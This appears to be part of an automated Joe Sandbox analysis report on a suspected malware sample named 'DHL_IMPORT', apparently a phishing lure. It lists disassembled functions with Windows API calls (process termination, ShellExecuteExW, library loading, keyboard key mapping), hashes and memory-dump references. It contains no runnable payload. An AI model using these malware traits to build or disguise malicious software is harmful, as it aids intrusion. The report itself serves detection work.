                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                          • String ID:
                                                                                          • API String ID: 43455801-0
                                                                                          • Opcode ID: 1a6fa9fb28381a22d7005ea5e028bb3ba185681c0249759a32624a83a1c798ba
                                                                                          • Instruction ID: 7d9f5a9ed9f8ce568a6349ebf7ee4607c5d54a2b87b16964e5625fcb22ff2b19
                                                                                          • Opcode Fuzzy Hash: 1a6fa9fb28381a22d7005ea5e028bb3ba185681c0249759a32624a83a1c798ba
                                                                                          • Instruction Fuzzy Hash: 87110976000118FFEF129F94EC88EAA7F6CFB08390F058012FA599A1A1C7719D55DBA1
                                                                                          Function 008351FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDC.USER32(00000000), ref: 00835218
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00835229
                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00835230
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00835238
                                                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0083524F
                                                                                          • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00835261
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDevice$Release
                                                                                          • String ID:
                                                                                          • API String ID: 1035833867-0
                                                                                          • Opcode ID: 4d206b98c540457ab60e913293f0eb017149f6dbb28a22d1be641cbc2de87343
                                                                                          • Instruction ID: 7fd214e856f8454af5f7fbfd85c6d2499b12c863d52878f2e2e75ebf86681435
                                                                                          • Opcode Fuzzy Hash: 4d206b98c540457ab60e913293f0eb017149f6dbb28a22d1be641cbc2de87343
                                                                                          • Instruction Fuzzy Hash: 5A016775E01714BBEB105BA59C49E5EBF78FF44751F045065FA45E7281DAB09C00CFA1
                                                                                          Function 007D1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 007D1BF4
                                                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 007D1BFC
                                                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 007D1C07
                                                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 007D1C12
                                                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 007D1C1A
                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 007D1C22
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Virtual
                                                                                          • String ID:
                                                                                          • API String ID: 4278518827-0
                                                                                          • Opcode ID: f2f5434d90278a4c11252bb8d46cf4685e37e37e90edb7acfad42b2e8c1c8f7f
                                                                                          • Instruction ID: 687ba47921f3d03b5538a56ecf57692ef54e8509ca7cffaf1fbbfa4d7c11a39e
                                                                                          • Opcode Fuzzy Hash: f2f5434d90278a4c11252bb8d46cf4685e37e37e90edb7acfad42b2e8c1c8f7f
                                                                                          • Instruction Fuzzy Hash: 090167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BE15C4BA42C7F5A864CBE5
                                                                                          Function 0083EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0083EB30
                                                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0083EB46
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 0083EB55
                                                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB64
                                                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB6E
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0083EB75
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 839392675-0
                                                                                          • Opcode ID: cc679814a6a0bf1107b1dd6f8cb7e5906394c7dd12174a6988bcbcb5f3a74824
                                                                                          • Instruction ID: 7a565d3d1b98be744fb3caeef5aa1684c47839155607acf7d6caa976e4961c81
                                                                                          • Opcode Fuzzy Hash: cc679814a6a0bf1107b1dd6f8cb7e5906394c7dd12174a6988bcbcb5f3a74824
                                                                                          • Instruction Fuzzy Hash: F1F01772240158BBE6216B62DC0EEBB7A7CFFCAB11F011159F642E119196E05A0186B9
                                                                                          Function 00827439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetClientRect.USER32(?), ref: 00827452
                                                                                          • SendMessageW.USER32(?,00001328,00000000,?), ref: 00827469
                                                                                          • GetWindowDC.USER32(?), ref: 00827475
                                                                                          • GetPixel.GDI32(00000000,?,?), ref: 00827484
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 00827496
                                                                                          • GetSysColor.USER32(00000005), ref: 008274B0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                          • String ID:
                                                                                          • API String ID: 272304278-0
                                                                                          • Opcode ID: 2897eea65885b5f14b39f3a13f314bcc9b57e3da8ee26c2ea8d9c5bcffba9bea
                                                                                          • Instruction ID: 4bf8432fa100c91517f8eaeb60373b00df933e4337fbf0e235d2afd98540852f
                                                                                          • Opcode Fuzzy Hash: 2897eea65885b5f14b39f3a13f314bcc9b57e3da8ee26c2ea8d9c5bcffba9bea
                                                                                          • Instruction Fuzzy Hash: 8A01AD31400215EFEB506FA4EC08BBA7BB5FF14311F126064FA56A21A0CB711E41EB54
                                                                                          Function 00831874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0083187F
                                                                                          • UnloadUserProfile.USERENV(?,?), ref: 0083188B
                                                                                          • CloseHandle.KERNEL32(?), ref: 00831894
                                                                                          • CloseHandle.KERNEL32(?), ref: 0083189C
                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 008318A5
                                                                                          • HeapFree.KERNEL32(00000000), ref: 008318AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                          • String ID:
                                                                                          • API String ID: 146765662-0
                                                                                          • Opcode ID: 77fa3bc4b8aec97cba6e7526bab630de11023e402109ab50f0ba13f19ac2428a
                                                                                          • Instruction ID: 45855c8a8b1cd25d42f9f75e000cfc1966f085fd8d47c355138f82c4cfbfbdfc
                                                                                          • Opcode Fuzzy Hash: 77fa3bc4b8aec97cba6e7526bab630de11023e402109ab50f0ba13f19ac2428a
                                                                                          • Instruction Fuzzy Hash: 87E0E536004101BBDB016FA6ED0CD1AFF39FF4AB22B129221F26581170CBB29420DF60
                                                                                          Function 0083C5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0083C6EE
                                                                                          • _wcslen.LIBCMT ref: 0083C735
                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0083C79C
                                                                                          • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0083C7CA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info_wcslen$Default
                                                                                          • String ID: 0
                                                                                          • API String ID: 1227352736-4108050209
                                                                                          • Opcode ID: b80dcfeeffe5d02694a64871af754b3f9f4775b7cc7ed4ae3aac5b0106b98443
                                                                                          • Instruction ID: 9f95cf98174b014e67d1d3b28d807a691b3774ae55d9d38d2072a5a1c9f122d2
                                                                                          • Opcode Fuzzy Hash: b80dcfeeffe5d02694a64871af754b3f9f4775b7cc7ed4ae3aac5b0106b98443
                                                                                          • Instruction Fuzzy Hash: 6951BF716143019BD7149F28C889B6BB7E8FFD9314F040A2DF995F32A1EBA4D904CB92
                                                                                          Function 0085AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 0085AEA3
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                          • GetProcessId.KERNEL32(00000000), ref: 0085AF38
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0085AF67
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseExecuteHandleProcessShell_wcslen
                                                                                          • String ID: <$@
                                                                                          • API String ID: 146682121-1426351568
                                                                                          • Opcode ID: b676bd8793ded3c6c2f8d17524eddaf0af683e34c49462f6ea9f4cf356757385
                                                                                          • Instruction ID: 0bee7db29d7fd59d5ed00fc8b39cf4986e3bc60b10c3821ba258fd39ffcb93a1
                                                                                          • Opcode Fuzzy Hash: b676bd8793ded3c6c2f8d17524eddaf0af683e34c49462f6ea9f4cf356757385
                                                                                          • Instruction Fuzzy Hash: 41718C75A00219DFCB18DF54D489A9EBBF0FF08304F04859AE816AB352DB74ED45CB91
                                                                                          Function 0083719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00837206
                                                                                          • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0083723C
                                                                                          • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0083724D
                                                                                          • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 008372CF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                          • String ID: DllGetClassObject
                                                                                          • API String ID: 753597075-1075368562
                                                                                          • Opcode ID: 89306fea5b1e11ba8d9072c512c990c6cfc4c51692de9449804bc763fe51f1f9
                                                                                          • Instruction ID: 640867ce8fd61e76147eb52f6ae53e3a644028ecf0cbd4234357a4472f743381
                                                                                          • Opcode Fuzzy Hash: 89306fea5b1e11ba8d9072c512c990c6cfc4c51692de9449804bc763fe51f1f9
                                                                                          • Instruction Fuzzy Hash: 66412DB1604205EFDB25CF94C884A9B7BA9FF85314F1580A9BD06DF20AD7B5D944CBE0
                                                                                          Function 00863D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00863E35
                                                                                          • IsMenu.USER32(?), ref: 00863E4A
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00863E92
                                                                                          • DrawMenuBar.USER32 ref: 00863EA5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$DrawInfoInsert
                                                                                          • String ID: 0
                                                                                          • API String ID: 3076010158-4108050209
                                                                                          • Opcode ID: 9e2a095f1c7f694f759118abd1039df231890f669e269497da46c75c4a394367
                                                                                          • Instruction ID: 1710b10faf9fd7761b673543355a6320d7cc6921f82d706dcba0f64e877d3a80
                                                                                          • Opcode Fuzzy Hash: 9e2a095f1c7f694f759118abd1039df231890f669e269497da46c75c4a394367
                                                                                          • Instruction Fuzzy Hash: AB4154B5A00209EFDB10DF60D888EAABBF9FF49354F05402AE905AB650D735AE40CF60
                                                                                          Function 00831DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00831E66
                                                                                          • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00831E79
                                                                                          • SendMessageW.USER32(?,00000189,?,00000000), ref: 00831EA9
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$_wcslen$ClassName
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 2081771294-1403004172
                                                                                          • Opcode ID: 3f7cf38cec6ab88580e3d9f373b7bde84edd24da50fe8c5d9692bf5aa15bc050
                                                                                          • Instruction ID: 2ac97ce0731a2bd16e092f3e67138206709c84e69b9ce9e377e1a338b39c8238
                                                                                          • Opcode Fuzzy Hash: 3f7cf38cec6ab88580e3d9f373b7bde84edd24da50fe8c5d9692bf5aa15bc050
                                                                                          • Instruction Fuzzy Hash: B9212371A00104AEDF14AB64DC49CFFB7B8FF85764F14411AF825E32E0DB794D0A8660
                                                                                          Function 0085C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: HKEY_LOCAL_MACHINE$HKLM
                                                                                          • API String ID: 176396367-4004644295
                                                                                          • Opcode ID: 3b12583bfcd084839f6d5eb03458551d0d734fd5b5504bf775f2d8aa12be6326
                                                                                          • Instruction ID: 944d28699e858fbbc5174728bf527b21acd4bcdf4d6f23c9ba21ea13b0a5d663
                                                                                          • Opcode Fuzzy Hash: 3b12583bfcd084839f6d5eb03458551d0d734fd5b5504bf775f2d8aa12be6326
                                                                                          • Instruction Fuzzy Hash: B431F7B26002798FCF22EF6C99404BF3BA1FBA1752B054029EC45EB345E674CD48DBA0
                                                                                          Function 00862F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00862F8D
                                                                                          • LoadLibraryW.KERNEL32(?), ref: 00862F94
                                                                                          • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00862FA9
                                                                                          • DestroyWindow.USER32(?), ref: 00862FB1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                          • String ID: SysAnimate32
                                                                                          • API String ID: 3529120543-1011021900
                                                                                          • Opcode ID: ecb8d5bc115c4f85dd7b72fad87bdd3a94f3aa44f380cc1f71c1db61b2b5b447
                                                                                          • Instruction ID: 28910fe9f4c37563576dfc74d62e9840f1fdb8f6cf2f9de95c536a001d56d85b
                                                                                          • Opcode Fuzzy Hash: ecb8d5bc115c4f85dd7b72fad87bdd3a94f3aa44f380cc1f71c1db61b2b5b447
                                                                                          • Instruction Fuzzy Hash: 8121DC71200609ABEF205FA4DC80FBB37B9FF59368F124268FA50D61A0CBB1DC519760
                                                                                          Function 007F4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,007F4D1E,008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002), ref: 007F4D8D
                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 007F4DA0
                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,007F4D1E,008028E9,?,007F4CBE,008028E9,008988B8,0000000C,007F4E15,008028E9,00000002,00000000), ref: 007F4DC3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                          • API String ID: 4061214504-1276376045
                                                                                          • Opcode ID: 9b4f72a97975287ac950f5891c2cf956afa6e2d54d21bb8cfff60523bd7b6257
                                                                                          • Instruction ID: 722cd4dc54e1bdfecc5725ae667188a03582b0d680417e4766dcbe4ad7bced1d
                                                                                          • Opcode Fuzzy Hash: 9b4f72a97975287ac950f5891c2cf956afa6e2d54d21bb8cfff60523bd7b6257
                                                                                          • Instruction Fuzzy Hash: 2AF04F34A4020CFBDB159F94DC49BBEBBB5FF44752F0540A5FA09A2360DB759940CB90
                                                                                          Function 0082D3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32 ref: 0082D3AD
                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0082D3BF
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0082D3E5
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
